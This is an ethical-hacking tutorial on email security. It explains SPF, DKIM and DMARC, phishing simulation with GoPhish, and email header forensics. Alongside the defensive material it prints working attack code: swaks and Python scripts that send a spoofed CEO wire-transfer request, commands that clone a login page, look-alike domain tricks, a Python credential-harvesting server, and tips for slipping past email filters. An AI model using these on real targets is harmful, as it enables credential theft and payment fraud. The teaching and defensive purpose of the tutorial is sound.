Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense
What will I learn
- How email actually works -- SMTP, MX records, and the authentication chain (SPF, DKIM, DMARC);
- Email spoofing -- how attackers forge sender addresses and what stops them (or doesn't);
- Phishing infrastructure -- building convincing phishing campaigns for authorized red team engagements;
- GoPhish -- setting up and running an authorized phishing simulation;
- Credential harvesting pages -- cloning login pages, capturing credentials, and evasion techniques;
- Email header analysis -- forensically tracing the origin of a suspicious email;
- Business Email Compromise (BEC) -- the billion-dollar attack that requires zero technical skill;
- Defense: SPF, DKIM, DMARC enforcement, user training, email gateway filtering.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- A domain you control (for phishing simulation lab);
- Understanding of DNS from Episode 3;
- The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate
Curriculum (of the Learn Ethical Hacking series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
- Learn Ethical Hacking (#20) - File Upload Vulnerabilities - When Users Upload Weapons
- Learn Ethical Hacking (#21) - API Security - The New Attack Surface
- Learn Ethical Hacking (#22) - Business Logic Flaws - When the Code Works But the Logic Doesn't
- Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS
- Learn Ethical Hacking (#24) - Content Management Systems - Hacking WordPress and Friends
- Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards
- Learn Ethical Hacking (#26) - The Full Web Pentest - Methodology and Reporting
- Learn Ethical Hacking (#27) - Bug Bounty Hunting - Getting Paid to Hack the Web
- Learn Ethical Hacking (#28) - The AI Web Attack Surface - AI Features as Vulnerabilities
- Learn Ethical Hacking (#29) - Network Sniffing - Seeing Everything on the Wire
- Learn Ethical Hacking (#30) - Wireless Network Attacks - Breaking Wi-Fi
- Learn Ethical Hacking (#31) - Privilege Escalation - Linux
- Learn Ethical Hacking (#32) - Privilege Escalation - Windows
- Learn Ethical Hacking (#33) - Active Directory Attacks - The Crown Jewels
- Learn Ethical Hacking (#34) - Pivoting and Lateral Movement - Spreading Through Networks
- Learn Ethical Hacking (#35) - Cloud Security - AWS Attack and Defense
- Learn Ethical Hacking (#36) - Cloud Security - Azure and GCP
- Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
- Learn Ethical Hacking (#38) - Infrastructure as Code - Securing the Automation
- Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense (this post)
Solutions to Episode 38 Exercises
Exercise 1: Secret scanning with trufflehog and gitleaks.
# Create test repo with a fake AWS key
mkdir secret-test && cd secret-test && git init
echo 'AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE' > config.env
echo 'AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY' >> config.env
git add . && git commit -m "add config"
git rm config.env && git commit -m "remove secrets"
# Scan with trufflehog
trufflehog git file://./
# Detected: AWS key in commit history (even though file deleted)
# Scan with gitleaks
gitleaks detect --source . --verbose
# Detected: 2 secrets (access key + secret key)
# Pre-commit hook setup
cat > .pre-commit-config.yaml << 'EOF'
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.0
    hooks:
      - id: gitleaks
EOF
pre-commit install
# Test: try to commit a new secret
echo 'GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' > new.env
git add new.env && git commit -m "oops"
# BLOCKED by pre-commit hook
Both tools found the AWS credentials in the original commit even after the file was deleted. trufflehog detected the secrets using both entropy analysis and regex patterns, reporting the exact commit hash and line. gitleaks produced a similar report with a structured JSON output showing the matched rule, the offending line, and the commit. The key difference: trufflehog also tries to verify whether the credential is still active (the --only-verified flag), which is useful for triage. gitleaks is faster for pure pattern matching. The pre-commit hook blocked the GITHUB_TOKEN commit instantly -- the commit never happened, so the secret never entered git history. This is why pre-commit hooks are the first line of defense, not CI scanning (which only fires after the secret is already in the remote).
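To make the pattern-matching half of this concrete, here is a minimal sketch of what a regex-based secret check looks like. The two patterns and the function name `find_secrets` are my own illustrative assumptions; they are not the actual rule sets of trufflehog or gitleaks, which are far larger and tuned against false positives.

```python
import re

# Illustrative patterns only (assumption): real scanners ship many more rules.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
}


def find_secrets(text):
    """Return a list of (rule_name, line_number, matched_text) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append((name, lineno, match.group(0)))
    return findings
```

Run against the contents of config.env from the exercise, this would flag the access key ID on line 1. It would not flag the secret access key, which has no fixed prefix; that is the kind of credential where entropy checks or provider-specific detectors earn their keep.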
Exercise 2: Terraform security scanning.
# Deliberately insecure config:
resource "aws_s3_bucket" "data" {
bucket = "company-data"
acl = "public-read" # Issue 1: public bucket
}
resource "aws_db_instance" "main" {
engine = "mysql"
username = "admin"
password = "admin123" # Issue 2: hardcoded password
}
resource "aws_security_group" "web" {
ingress {
from_port = 22
to_port = 22
cidr_blocks = ["0.0.0.0/0"] # Issue 3: SSH open to world
}
}
tfsec results:
CRITICAL: aws_db_instance.main has hardcoded password
CRITICAL: aws_s3_bucket.data has public-read ACL
HIGH: aws_security_group.web allows SSH from 0.0.0.0/0
HIGH: aws_s3_bucket.data missing encryption
MEDIUM: aws_s3_bucket.data missing logging
Checkov results:
CKV_AWS_16: FAILED - RDS instance not encrypted
CKV_AWS_17: FAILED - RDS logging not enabled
CKV_AWS_20: FAILED - S3 bucket has public ACL
CKV_AWS_145: FAILED - S3 missing KMS encryption
CKV_AWS_24: FAILED - Security group allows SSH from 0.0.0.0/0
+ hardcoded password detected
Both tools caught all three deliberate issues. tfsec focused on Terraform-specific patterns and gave clear remediation guidance per finding. Checkov mapped each finding to a specific CKV benchmark ID and also flagged additional issues (missing encryption at rest for both RDS and S3, missing access logging) that tfsec surfaced as lower-severity warnings. Running both tools in CI is the pattern -- tfsec for Terraform-specific depth, Checkov for broad multi-framework coverage.
Exercise 3: Codecov supply chain attack analysis.
Attack timeline:
- Jan 31 2021: Attackers modify the Codecov Bash Uploader script, using a credential extracted from a Codecov Docker image
- The script was fetched by thousands of CI pipelines every build
- Modified script exfiltrated CI environment variables to
attacker-controlled server (a single extra curl command)
- April 1 2021: Discovered by a customer who noticed the
script's checksum didn't match the published hash
- Duration undetected: 2 months
Impact:
- Thousands of repos affected
- Major disclosures: HashiCorp (leaked GPG signing key),
Rapid7 (internal tooling source code), and others
- Every CI pipeline using the Codecov uploader leaked ALL
environment variables -- AWS keys, deploy tokens, API secrets
Why detection failed:
- Script was fetched fresh each build (no pinned version)
- No integrity check (checksum/signature verification)
- Exfiltration was a single curl to an attacker server --
blended in with normal CI network traffic
- No egress filtering on CI runners
Prevention:
- Pin script to specific SHA/version, not :latest
- Verify script checksum before execution
- Use OIDC authentication (no long-lived secrets in CI env)
- Egress filtering (block unknown outbound connections)
- Use the Codecov GitHub Action instead of curl | bash
The Codecov attack is the textbook supply chain compromise: modify one widely-used script, and every downstream CI pipeline running it delivers your payload. The curl | bash pattern -- fetching a remote script and executing it inline -- is inherently insecure because you're trusting the remote server to serve the same content every time. Pinning to a specific commit hash and verifying the checksum before execution would have caught the modification immediately.
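The "verify the checksum before execution" step can be sketched in a few lines. This is a minimal illustration, assuming you keep a pinned SHA-256 digest in your own repository; the function names `sha256_hex` and `verify_script` are hypothetical, and the download step is deliberately left out so the check itself stays in focus.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Hex-encoded SHA-256 digest of the given bytes."""
    return hashlib.sha256(data).hexdigest()


def verify_script(data: bytes, expected_sha256: str) -> bool:
    """True only if the downloaded bytes match the pinned digest."""
    actual = sha256_hex(data)
    # compare_digest performs a constant-time comparison of the two strings
    return hmac.compare_digest(actual, expected_sha256.strip().lower())
```

The CI job would fetch the script into memory or a temp file, call `verify_script`, and refuse to execute on a mismatch. The important design choice is that the expected digest lives somewhere the script's publisher cannot change, such as your own repo, not next to the script on the same server.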
Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense
Episode 38 covered Infrastructure as Code security -- Terraform state file exposure, git repository secrets, CI/CD pipeline attacks, Jenkins as a legacy goldmine, Ansible Vault traps, CloudFormation and ARM template misconfigurations, and Policy as Code with tfsec and Checkov. You can now find secrets buried in git history with trufflehog, scan IaC files before deployment, and understand why a single misconfigured line in Terraform can replicate across hundreds of resources.
But all of that -- the cloud exploits, the container escapes, the IaC misconfigurations, the privilege escalation chains -- assumes the attacker is already inside the network or has some form of access. And in the real world, the question that matters most is: how does an attacker get that initial access in the first place?
The answer, consistently, year after year, report after report: email. Verizon's Data Breach Investigations Report has put phishing as the number one initial access vector for over a decade. Not zero-days. Not supply chain attacks. Not misconfigured cloud services. Plain old email. Someone receives a message, clicks a link, enters their credentials, and the attacker walks in through the front door.
Here we go.
Email -- The Protocol That Was Never Designed to Be Secure
SMTP was defined in 1982 (RFC 821, later updated as RFC 5321). To put that in context: this was a year before TCP/IP became the standard protocol for ARPANET, and a decade before the World Wide Web existed. The designers of SMTP were building a messaging system for a trusted network of academic institutions and government labs. Authentication? Encryption? Sender verification? None of those were design requirements. The protocol was built on the implicit assumption that everyone on the network was who they said they were.
That assumption was wrong then and it's catastrophically wrong now, but we're still running the same protocol. Every security mechanism bolted onto email -- SPF (2003, published as RFC in 2006), DKIM (2007), DMARC (2012, published 2015) -- is a patch on top of a protocol that was never designed to be secure. And patches on insecure foundations have a consistent track record: they help, but they don't solve the fundamental problem.
Your mail client
-> Your SMTP server (port 25/587)
-> DNS lookup: MX record for recipient domain
-> Recipient's MX server (port 25)
-> Recipient's mailbox
|
|-- Authentication checks: SPF, DKIM, DMARC
|-- Spam filters: content analysis, reputation
|-- The "From:" header? Just a text field.
The critical vulnerability that makes email spoofing possible: the "From" header is just a text field. There is nothing in the SMTP protocol that prevents you from setting it to any address you want. When you send an email, your SMTP server does not verify that you are authorized to send as that address. It just takes whatever you give it and passes it along. The recipient's server might check (if SPF, DKIM, and DMARC are configured), but the SENDING side has zero enforcement.
This is like being able to write any return address on a physical envelope. The post office delivers it regardless -- and the recipient sees whatever return address the sender chose to write.
Email Spoofing -- The Foundation of Phishing
Let me show you how trivially easy it is to spoof a sender address. This is why email authentication exists -- and why it's so important to get right:
# swaks -- the Swiss Army Knife for SMTP testing
# Install: apt install swaks
# Send a spoofed email
swaks --to target@example.com \
--from ceo@example.com \
--header "Subject: Urgent - Wire Transfer Needed" \
--body "Please wire $50,000 to account 9876543. This is time-sensitive." \
--server mail.example.com \
--port 25
# With more convincing headers
swaks --to finance@company.com \
--from "John Smith, CEO <[email protected]>" \
--header "Subject: RE: Q3 Acquisition - Final Step" \
--header "Reply-To: [email protected]" \
--header "X-Mailer: Microsoft Outlook 16.0" \
--body "$(cat phishing_body.txt)" \
--server mail.company.com
# Python approach -- using smtplib
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
msg = MIMEMultipart()
msg['From'] = '[email protected]'
msg['To'] = '[email protected]'
msg['Subject'] = 'RE: Urgent Wire Transfer - Confidential'
msg['Reply-To'] = '[email protected]'
body = """Hi Sarah,
I need you to process a wire transfer of $200,000 to the
account below before end of day. This is for the acquisition
we discussed last week. Please keep this confidential until
the deal closes.
Account: 12345678
Routing: 987654321
Bank: First National
Thanks,
John Smith
CEO, TargetCompany Inc.
"""
msg.attach(MIMEText(body, 'plain'))
# Whether this works depends ENTIRELY on the target's
# SPF, DKIM, and DMARC configuration
with smtplib.SMTP('target-mx.targetcompany.com', 25) as server:
server.sendmail(
'[email protected]',
'[email protected]',
msg.as_string()
)
Whether these spoofed emails actually reach the inbox depends on three layers of authentication that the recipient's domain may (or may not) have configured. And the emphasis here is on "may" -- a surprising number of organizations have incomplete or ineffective email authentication, even in 2026.
SPF -- Who Is Allowed to Send for This Domain?
SPF (Sender Policy Framework) is a DNS TXT record that declares which IP addresses and mail servers are authorized to send email on behalf of a domain. When a receiving server gets an email claiming to come from an address at company.com (strictly, the domain of the envelope sender, the SMTP MAIL FROM), it looks up the SPF record for company.com and checks whether the sending server's IP address is in the authorized list:
# Check a domain's SPF record
dig TXT company.com | grep spf
# Typical SPF record:
# v=spf1 include:_spf.google.com include:amazonses.com ip4:203.0.113.0/24 -all
# Breaking it down:
# v=spf1 -- SPF version 1
# include:_spf.google.com -- Google Workspace is authorized
# include:amazonses.com -- Amazon SES is authorized
# ip4:203.0.113.0/24 -- this IP range is authorized
# -all -- REJECT everything else (hard fail)
# The "-all" vs "~all" distinction is CRITICAL:
# -all = hard fail: reject unauthorized senders (SECURE)
# ~all = soft fail: accept but mark suspicious (WEAK)
# ?all = neutral: do nothing (USELESS)
# +all = pass everything (BROKEN -- allows anyone to spoof)
# Common misconfigured SPF records:
dig TXT vulnerable-company.com
# v=spf1 ~all
# This is soft fail -- most receiving servers accept anyway
# Attacker can spoof this domain with minimal friction
dig TXT really-vulnerable.com
# (no SPF record at all)
# No SPF = no sender verification = anyone can spoof
The soft fail (~all) problem is endemic. Organizations set ~all during initial SPF setup because "we want to monitor first and make sure we don't block legitimate email." The intention is to switch to -all (hard fail) after confirming that all legitimate senders are in the SPF record. In practice, the switch never happens. The "monitoring period" becomes permanent. And ~all provides almost no protection because most receiving servers treat soft fail the same as no SPF at all -- the email gets delivered, maybe with a slightly higher spam score.
I've done SPF assessments for organizations that had ~all in their SPF record for years. When I asked why they hadn't switched to hard fail, the answer was always some variant of "we're afraid of blocking legitimate email." The fear is understandable but backwards -- the risk of a spoofed email causing a BEC incident (which we'll get to later) is orders of magnitude higher than the risk of temporarily blocking one legitimate sender while debugging the SPF record.
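If you are auditing many domains, classifying the `all` mechanism by eye gets tedious. Below is a minimal sketch that takes an SPF record string (as returned by dig) and reports which of the four qualifiers it ends with. The function name and return labels are my own; it does not follow `include:` or `redirect=` chains, so treat it as a first-pass triage and not a full SPF evaluator.

```python
def spf_all_policy(record: str) -> str:
    """Classify the 'all' mechanism of a single SPF record string."""
    terms = record.strip().strip('"').split()
    if not terms or terms[0].lower() != "v=spf1":
        return "not-spf"
    for term in terms[1:]:
        t = term.lower()
        if t in ("all", "+all"):
            return "pass"       # +all: anyone may send (broken)
        if t == "-all":
            return "hardfail"   # reject unauthorized senders
        if t == "~all":
            return "softfail"   # accept but mark suspicious
        if t == "?all":
            return "neutral"    # no assertion either way
    # No 'all' mechanism present; without a redirect this evaluates as neutral
    return "none"
```

For example, `spf_all_policy("v=spf1 ~all")` returns `"softfail"`, which is the finding you would write up as "SPF present but not enforced".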
DKIM -- Cryptographic Proof of Origin
DKIM (DomainKeys Identified Mail) adds a cryptographic signature to outgoing emails. The sending server signs selected headers and the message body with a private key. The public key is published in DNS. The receiving server retrieves the public key and verifies the signature:
# Check for DKIM public key in DNS
# You need the selector (found in DKIM-Signature header)
dig TXT google._domainkey.company.com
# Returns: v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GN...
# In the email headers, a DKIM signature looks like:
# DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
# d=company.com; s=google;
# h=from:to:subject:date:message-id:mime-version;
# bh=47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=;
# b=dGhpcyBpcyBhIGZha2Ugc2lnbmF0dXJlIGJ1dCBp...
# d= is the signing domain
# s= is the selector (used to find the public key in DNS)
# h= lists which headers were signed
# bh= is the body hash
# b= is the signature
DKIM is stronger than SPF because it's cryptographic -- you can't forge a valid DKIM signature without the private key. But DKIM alone has a critical limitation: it only proves that the email was signed by a key associated with a specific domain. It does NOT enforce that the "From" address matches the signing domain. An attacker could sign an email with their own domain's DKIM key while setting the "From" address to an address at the target's domain. The DKIM signature is valid (for the attacker's domain), but the "From" address is still spoofed.
This is why you need the third piece of the puzzle.
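The tag list in a DKIM-Signature header is easy to pick apart programmatically, which is handy when you want to know which selector to look up or whether `d=` matches the visible sender. The following is a parsing sketch only, with function names of my own choosing. It does NOT verify the signature; for that you would reach for a dedicated DKIM library.

```python
def parse_dkim_signature(header_value: str) -> dict:
    """Split a DKIM-Signature header value into its tag=value pairs."""
    tags = {}
    for part in header_value.split(";"):
        if "=" not in part:
            continue
        # Split on the FIRST '=' only: base64 values may end in '=' padding
        name, _, value = part.partition("=")
        # Folding whitespace inside a value is not significant, so drop it
        tags[name.strip()] = "".join(value.split())
    return tags


def dkim_key_dns_name(tags: dict) -> str:
    """DNS name where the public key for this signature is published."""
    return f"{tags['s']}._domainkey.{tags['d']}"
```

Feeding it the example header above yields `d` = company.com and `s` = google, so the key lives at google._domainkey.company.com. Comparing `tags['d']` with the domain in the From header is exactly the check that DKIM itself leaves out.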
DMARC -- Tying It All Together
DMARC (Domain-based Message Authentication, Reporting, and Conformance) is the policy layer that ties SPF and DKIM together. It tells receiving servers: "if an email claims to be from my domain and fails BOTH SPF and DKIM alignment, here's what you should do with it."
# Check DMARC record
dig TXT _dmarc.company.com
# Strong DMARC (secure):
# v=DMARC1; p=reject; rua=mailto:[email protected]; pct=100
# p=reject -- reject emails that fail authentication (STRONGEST)
# pct=100 -- apply to 100% of email (not sampling)
# Medium DMARC:
# v=DMARC1; p=quarantine; rua=mailto:[email protected]
# p=quarantine -- send failures to spam folder
# Useless DMARC:
# v=DMARC1; p=none; rua=mailto:[email protected]
# p=none -- do nothing except send reports
# This provides ZERO protection against spoofing
# But it's the default starting point and many never change it
The critical concept is alignment. DMARC checks that the domain in the "From" header aligns with either the SPF domain (the envelope sender's domain) or the DKIM signing domain. If neither aligns, the DMARC policy is applied. With p=reject, the email is dropped. With p=none, it's delivered anyway.
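Alignment is easier to reason about when you see it as code. The sketch below models relaxed alignment: DMARC passes if either SPF or DKIM both passed and used a domain that shares the From header's organizational domain. One loud assumption: `org_domain` just takes the last two labels, whereas real implementations consult the Public Suffix List, so this is wrong for suffixes like co.uk. All function names here are hypothetical.

```python
from email.utils import parseaddr


def org_domain(domain: str) -> str:
    """Naive organizational domain: the last two labels.
    ASSUMPTION: real DMARC code uses the Public Suffix List instead."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def header_from_domain(from_header: str) -> str:
    """Domain part of the address in a From header value."""
    _, addr = parseaddr(from_header)
    return addr.rpartition("@")[2].lower()


def dmarc_aligned(from_header, spf_pass, spf_domain, dkim_pass, dkim_domain):
    """Relaxed-mode DMARC result: True if SPF or DKIM passed AND aligned."""
    from_org = org_domain(header_from_domain(from_header))
    spf_ok = bool(spf_pass) and org_domain(spf_domain) == from_org
    dkim_ok = bool(dkim_pass) and org_domain(dkim_domain) == from_org
    return spf_ok or dkim_ok
```

The interesting case is the attacker who passes SPF and DKIM for their own domain: both mechanisms report "pass", but neither domain aligns with the From header, so `dmarc_aligned` returns False and the domain owner's policy (none, quarantine, or reject) kicks in.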
#!/bin/bash
# Quick recon script to check email security for a target domain
# Pass the domain as the first argument
DOMAIN=$1
if [ -z "$DOMAIN" ]; then
    echo "Usage: $0 <domain>"
    exit 1
fi
echo "=== Email Security Assessment for $DOMAIN ==="
echo -e "\n--- SPF ---"
dig +short TXT "$DOMAIN" | grep -i 'v=spf1'
# Check for -all vs ~all vs ?all
echo -e "\n--- DMARC ---"
dig +short TXT "_dmarc.$DOMAIN"
# Check for p=reject vs p=quarantine vs p=none
echo -e "\n--- MX Records ---"
dig +short MX "$DOMAIN"
# Shows which mail servers handle this domain
echo -e "\n--- Common DKIM Selectors ---"
for sel in google default selector1 selector2 s1 s2 k1 mail smtp; do
    result=$(dig +short TXT "${sel}._domainkey.${DOMAIN}" 2>/dev/null)
    if [ -n "$result" ]; then
        echo "Selector '$sel': FOUND"
    fi
done
The reconnaissance value of this is significant. If a target domain has no SPF, no DMARC, or DMARC with p=none, you know immediately that you can spoof emails from that domain with high deliverability. If they have p=reject and a tight SPF with -all, spoofing that specific domain is much harder (though you can still use look-alike domains, which we'll cover shortly).
Having said that, even p=reject is not bulletproof. DMARC only protects the exact domain in the From header. It does NOT protect against:
- Cousin domains: company-support.com instead of company.com
- Display name spoofing: "CEO John Smith" <[email protected]> -- the display name says CEO, the actual address is a gmail
- Compromised accounts: if the attacker has actual access to a legitimate mailbox, DMARC can't help because the email IS legitimately from that domain
GoPhish -- Professional Phishing Simulation
GoPhish (https://github.com/gophish/gophish) is the standard open-source framework for authorized phishing simulations. It provides a complete workflow: create email templates, build landing pages, import target lists, launch campaigns, and track results in real-time:
# Download and start GoPhish
wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip
chmod +x gophish
./gophish
# Web UI: https://localhost:3333
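# Default user: admin. Since v0.10.1 the initial password is randomly
# generated and printed in the startup log (older releases used
# admin / gophish). Change it at first login.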
# The listener (phishing server) runs on port 80 by default
# GoPhish workflow:
# 1. Sending Profile -- configure SMTP server
# - Your lab SMTP server (Postfix) or a transactional sender
# - Set the "From" address for phishing emails
#
# 2. Email Template -- craft the phishing email
# - HTML editor with variable support
# - {{.FirstName}}, {{.LastName}}, {{.Position}}
# - Add tracking image (1x1 pixel, reports when email is opened)
# - Include {{.URL}} -- GoPhish's tracking link
#
# 3. Landing Page -- the credential harvesting page
# - "Import Site" clones any URL automatically
# - Enable "Capture Submitted Data"
# - Enable "Capture Passwords"
# - Set redirect URL (send user to real site after capture)
#
# 4. Users & Groups -- import target list
# - CSV: First Name, Last Name, Email, Position
#
# 5. Campaign -- bring it all together
# - Select: sending profile, template, landing page, user group
# - Set launch date (immediate or scheduled)
# - Launch
#
# 6. Results Dashboard
# - Email sent / Email opened / Link clicked / Data submitted
# - Per-user tracking with timestamps
# - Export results as CSV for reporting
Building a Convincing Phishing Page
The landing page is where credentials are actually captured. GoPhish's "Import Site" feature makes this trivially easy -- point it at any login page and it clones the HTML, CSS, and images automatically. But for red team engagements where realism matters, you want to go further:
# Clone a login page with wget (more thorough than GoPhish's importer)
wget --mirror --convert-links --adjust-extension \
--page-requisites --no-parent \
https://login.targetcompany.com/
# Or with httrack for more complex sites
httrack "https://login.targetcompany.com/" \
-O "/tmp/phishing-site" \
"+*.targetcompany.com/*" -v
# Register a convincing look-alike domain
# targetcompany.com -> target-company.com (hyphenation)
# targetcompany.com -> targetcompany.co (TLD swap)
# targetcompany.com -> targetcornpany.com (rn looks like m)
# targetcompany.com -> targetcompany-sso.com (subdomain style)
# targetcompany.com -> targetcompamy.com (adjacent key: n->m)
# Get a legitimate TLS certificate (free, automated)
certbot certonly --standalone -d login.target-company.com
# Now your phishing page has a valid HTTPS padlock
# Users have been trained to "look for the padlock" -- which
# proves NOTHING about the legitimacy of the site, only that
# the connection is encrypted
# Simple credential harvesting server (for lab use)
from http.server import HTTPServer, SimpleHTTPRequestHandler
import urllib.parse
import datetime
class PhishHandler(SimpleHTTPRequestHandler):
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
params = urllib.parse.parse_qs(post_data.decode())
# Log captured credentials
timestamp = datetime.datetime.now().isoformat()
with open('captured_creds.log', 'a') as f:
f.write(f"[{timestamp}] {self.client_address[0]}\n")
for key, values in params.items():
f.write(f" {key}: {values[0]}\n")
f.write("\n")
# Redirect to real login page (user thinks login failed)
self.send_response(302)
self.send_header('Location', 'https://login.targetcompany.com/')
self.end_headers()
httpd = HTTPServer(('0.0.0.0', 443), PhishHandler)
# Add TLS with your certbot certificate
import ssl
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain('fullchain.pem', 'privkey.pem')
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
The redirect after credential capture is a classic technique -- the user enters their password, gets redirected to the real login page, thinks "hmm, must have mistyped," enters their password again on the legitimate site, and logs in successfully. They never suspect anything happened. The attacker has their credentials. The user has a slightly confused memory of "the login was weird for a second."
For authorized engagements, this technique needs to be documented in the scope agreement and the captured credentials need to be handled according to the rules of engagement (typically: hash immediately, never store in plaintext, delete after reporting).
Phishing Infrastructure for Red Teams
Professional red team phishing requires more than GoPhish on a VPS. The infrastructure needs to survive email filters, avoid blacklists, and maintain operational security:
# Infrastructure checklist for a red team phishing engagement:
# 1. Domain age and reputation
# Register the look-alike domain at LEAST 2 weeks before the campaign
# Brand new domains have zero reputation and get flagged immediately
# Send legitimate test emails first to build reputation with major
# providers (Gmail, O365, Yahoo)
# 2. DNS setup
# Set proper PTR record (reverse DNS) for your sending IP
# Configure SPF for YOUR phishing domain (ironic, right?)
dig TXT phishing-domain.com
# v=spf1 ip4:YOUR.SERVER.IP -all
# Configure DKIM signing
# Configure DMARC
dig TXT _dmarc.phishing-domain.com
# v=DMARC1; p=reject
# 3. The phishing domain itself MUST have proper email auth
# This is counter-intuitive: you're spoofing your own domain
# not the target's. The email says "IT Support <[email protected]>"
# and the email is LEGITIMATELY from target-company.com (your domain)
# with valid SPF, DKIM, and DMARC -- because you OWN that domain
# 4. Email sending rate limiting
# Don't blast 500 emails in 10 seconds
# Stagger sends over hours (GoPhish supports this)
# Major providers throttle or block sudden volume spikes
# 5. Categorize your domain with web proxy vendors
# Submit your domain to Blue Coat, Zscaler, Palo Alto for categorization
# Request: "Business" or "Technology" category
# Uncategorized domains are often blocked by enterprise web proxies
Email Header Analysis -- Forensic Investigation
When you receive a suspicious email -- or when you're investigating an incident -- the email headers tell the complete story of where that email actually came from, regardless of what the "From" field says:
# Key headers to examine (read BOTTOM-UP for chronological order):
# Received: -- each mail server adds a Received header as the email
# passes through it. The bottom-most Received header is the original
# sender. The top-most is the last server before your mailbox.
# Return-Path: -- the envelope sender (the address SPF evaluates; it can differ from From:)
# Authentication-Results: -- SPF/DKIM/DMARC verification results
# X-Originating-IP: -- the sender's IP (if the server adds it)
# Message-ID: -- unique identifier, domain part should match sender
# X-Mailer: -- the email client used (useful for profiling)
# Email header analysis script
import email
import re
import sys
from email.utils import parseaddr


def domain_of(header_value):
    """Return the lowercased domain of the address in a header, or ''."""
    _, addr = parseaddr(str(header_value or ''))
    return addr.rpartition('@')[2].lower() if '@' in addr else ''


def analyze_headers(eml_file):
    # Suspicious mail is often malformed, so tolerate bad bytes
    with open(eml_file, errors='replace') as f:
        msg = email.message_from_file(f)

    print("=== Email Header Analysis ===\n")

    # Display sender info (any of these headers may be missing)
    for name in ('From', 'Reply-To', 'Return-Path', 'Message-ID', 'X-Mailer'):
        print(f"{name}: {msg.get(name, 'not set')}")

    # Check for From/Return-Path mismatch (possible spoofing indicator)
    from_domain = domain_of(msg.get('From'))
    rp_domain = domain_of(msg.get('Return-Path'))
    mismatch = bool(rp_domain) and from_domain != rp_domain
    if mismatch:
        print(f"\n*** WARNING: From domain ({from_domain}) != "
              f"Return-Path domain ({rp_domain}) ***")
        print("    Possible spoofing indicator (also common with "
              "legitimate bulk senders)")

    # Authentication results (there may be more than one header)
    auth_headers = [str(v) for v in msg.get_all('Authentication-Results', [])]
    auth = ' | '.join(auth_headers) or 'not present'
    print(f"\nAuthentication-Results:\n  {auth}")

    # Trace the delivery path (Received headers, bottom-up)
    received = msg.get_all('Received', [])
    print(f"\n=== Delivery Path ({len(received)} hops) ===")
    for i, hop in enumerate(reversed(received)):
        hop = str(hop)
        # Extract IPv4 addresses from the hop
        ips = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', hop)
        hop_clean = ' '.join(hop.split())[:120]
        print(f"\nHop {i+1}: {hop_clean}...")
        if ips:
            print(f"  IPs: {', '.join(ips)}")

    # Red flags check
    print("\n=== Red Flags ===")
    flags = []
    auth_l = auth.lower()
    if 'spf=fail' in auth_l or 'spf=softfail' in auth_l:
        flags.append("SPF failed or softfailed")
    if 'dkim=fail' in auth_l:
        flags.append("DKIM verification failed")
    if 'dmarc=fail' in auth_l:
        flags.append("DMARC check failed")
    if mismatch:
        flags.append("From/Return-Path domain mismatch")
    # Compare addresses, not raw header strings, to ignore display names
    reply_addr = parseaddr(str(msg.get('Reply-To', '')))[1].lower()
    from_addr = parseaddr(str(msg.get('From', '')))[1].lower()
    if reply_addr and reply_addr != from_addr:
        flags.append("Reply-To differs from From (replies go elsewhere)")

    if flags:
        for flag in flags:
            print(f"  [!] {flag}")
    else:
